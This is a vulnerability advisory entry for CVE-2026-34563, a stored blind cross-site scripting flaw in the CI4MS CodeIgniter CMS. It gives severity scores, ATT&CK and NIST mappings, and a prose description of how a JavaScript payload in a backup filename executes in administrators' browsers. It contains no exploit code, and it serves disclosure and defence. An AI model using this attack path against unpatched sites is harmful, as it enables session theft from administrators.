CVE-2026-34563
Published: 01 April 2026
Summary
CVE-2026-34563 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Ci4-Cms-Erp Ci4Ms. Its CVSS base score is 9.1 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 15.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
SI-10 requires validation of user-controlled inputs like backup filenames to prevent injection of malicious JavaScript payloads during upload processing.
SI-15 mandates filtering or encoding of outputs in backup management views to neutralize stored XSS payloads before browser rendering.
SI-9 enforces restrictions on information inputs such as filename characters and patterns to block malicious payloads at backup upload boundaries.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS in public-facing CMS web app enables T1190 exploitation to inject/execute JS (T1059.007) in admin browsers, directly facilitating session cookie theft (T1539).
NVD Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An…
more
attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, which uses SQL functionality to insert the XSS payload server-side. This stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS). This issue has been patched in version 0.31.0.0.
Deeper analysisAI
CVE-2026-34563 is a stored blind cross-site scripting (XSS) vulnerability (CWE-79) affecting CI4MS, a CodeIgniter 4-based CMS skeleton providing production-ready modular architecture with RBAC authorization and theme support. In versions prior to 0.31.0.0, the application does not properly sanitize user-controlled input during backup upload handling and metadata processing. This allows injection of a malicious JavaScript payload into the backup filename, such as via an uploaded file named xss.sql, which leverages SQL functionality to insert the payload server-side. The stored payload is then rendered without proper output encoding in multiple backup management views. The vulnerability carries a CVSS v3.1 base score of 9.1 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L).
An authenticated attacker with low privileges (PR:L) can exploit this issue remotely over the network with low complexity and no user interaction required. By uploading a specially crafted backup file containing the XSS payload in its filename, the attacker triggers server-side SQL insertion of the payload. When administrators or other users view affected backup management interfaces, the unsafely rendered payload executes in their browsers, enabling theft of session cookies, keystrokes, or other sensitive data due to the changed scope (S:C) and high confidentiality impact (C:H).
The issue has been addressed in CI4MS version 0.31.0.0, as detailed in the project's GitHub release notes and security advisory (GHSA-85m8-g393-jcxf). Security practitioners should upgrade to the patched version and review backup upload functionalities for similar input sanitization gaps.
Details
- CWE(s)